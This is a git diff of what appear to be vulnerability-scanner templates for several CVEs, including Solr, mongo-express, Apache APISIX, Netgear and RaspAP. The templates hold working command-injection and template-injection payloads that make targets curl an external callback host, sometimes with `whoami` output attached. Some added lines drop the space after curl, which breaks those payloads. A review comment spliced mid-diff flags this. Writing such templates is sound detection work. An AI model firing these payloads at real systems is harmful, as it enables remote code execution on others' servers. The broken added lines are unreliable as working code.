diff --git a/cves/2019/CVE-2019-0193.yaml b/cves/2019/CVE-2019-0193.yaml
index 4df541d3a7..360706171e 100644
--- a/cves/2019/CVE-2019-0193.yaml
+++ b/cves/2019/CVE-2019-0193.yaml
@@ -34,7 +34,7 @@ requests:
 Content-type: application/x-www-form-urlencoded
 X-Requested-With: XMLHttpRequest
- command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
+ command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
 extractors:
 - type: regex
diff --git a/cves/2019/CVE-2019-10758.yaml b/cves/2019/CVE-2019-10758.yaml
index 32cbffabb0..0e50aa9b69 100644
--- a/cves/2019/CVE-2019-10758.yaml
+++ b/cves/2019/CVE-2019-10758.yaml
@@ -26,7 +26,7 @@ requests:
 Authorization: Basic YWRtaW46cGFzcw==
 Content-Type: application/x-www-form-urlencoded
- document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}")
+ document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl{{interactsh-url}}")
 matchers:
 - type: word
 part: interactsh_protocol # Confirms the HTTP Interaction
diff --git a/cves/2019/CVE-2019-17558.yaml b/cves/2019/CVE-2019-17558.yaml
index 26673df9ee..97a4563023 100644
--- a/cves/2019/CVE-2019-17558.yaml
+++ b/cves/2019/CVE-2019-17558.yaml
@@ -39,7 +39,7 @@ requests:
 }
 - |
- GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
+ GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
 Host: {{Hostname}}
 Connection: close
diff --git a/cves/2019/CVE-2019-3929.yaml b/cves/2019/CVE-2019-3929.yaml
index 2aeb041e0c..213dd63277 100644
--- a/cves/2019/CVE-2019-3929.yaml
+++ b/cves/2019/CVE-2019-3929.yaml
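Review bot: The new `document=` line in cves/2019/CVE-2019-10758.yaml ends in `execSync("curl{{interactsh-url}}")`, so the space after `curl` was dropped together with the `http://` prefix. The target would then be asked to run a command named `curl<host>` instead of curl with an argument, no interaction would be recorded, and the `interactsh_protocol` matcher would report a vulnerable host as clean. It should read `execSync("curl {{interactsh-url}}")`. The same slip is in the `filter_func` part of the `"body"` line in cves/2022/CVE-2022-24112.yaml (`os.execute('curl{{interactsh-url}}/...`), which additionally moves from `https://` to curl's default scheme; the other five files in this diff keep a separator (`curl%20`, `curl%2b` or a literal space).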
@@ -22,7 +22,7 @@ requests:
 path:
 - "{{BaseURL}}/cgi-bin/file_transfer.cgi"
- body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//{{interactsh-url}}Pa_Note%27"
+ body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27"
 headers:
 Content-Type: application/x-www-form-urlencoded
diff --git a/cves/2021/CVE-2021-20167.yaml b/cves/2021/CVE-2021-20167.yaml
index ab50335740..bf2fc021a8 100644
--- a/cves/2021/CVE-2021-20167.yaml
+++ b/cves/2021/CVE-2021-20167.yaml
@@ -23,7 +23,7 @@ requests:
 POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1
 Host: {{Hostname}}
- "name":"';$(curl http://{{interactsh-url}});'",
+ "name":"';$(curl {{interactsh-url}});'",
 "email":"a@b.c"
 matchers:
diff --git a/cves/2021/CVE-2021-33357.yaml b/cves/2021/CVE-2021-33357.yaml
index cb52ddd4ea..352972c349 100644
--- a/cves/2021/CVE-2021-33357.yaml
+++ b/cves/2021/CVE-2021-33357.yaml
@@ -21,7 +21,7 @@ info:
 requests:
 - method: GET
 path:
- - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20http://{{interactsh-url}}/`whoami`;"
+ - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"
 matchers-condition: and
 matchers:
diff --git a/cves/2022/CVE-2022-24112.yaml b/cves/2022/CVE-2022-24112.yaml
index 119a801f06..3b2bcb4e90 100644
--- a/cves/2022/CVE-2022-24112.yaml
+++ b/cves/2022/CVE-2022-24112.yaml
@@ -41,7 +41,7 @@ requests:
 {
 "method":"PUT",
 "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
- "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl https://{{interactsh-url}}/`whoami`'); return true end\"}"
+ "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl{{interactsh-url}}/`whoami`'); return true end\"}"
 }
 ]
 }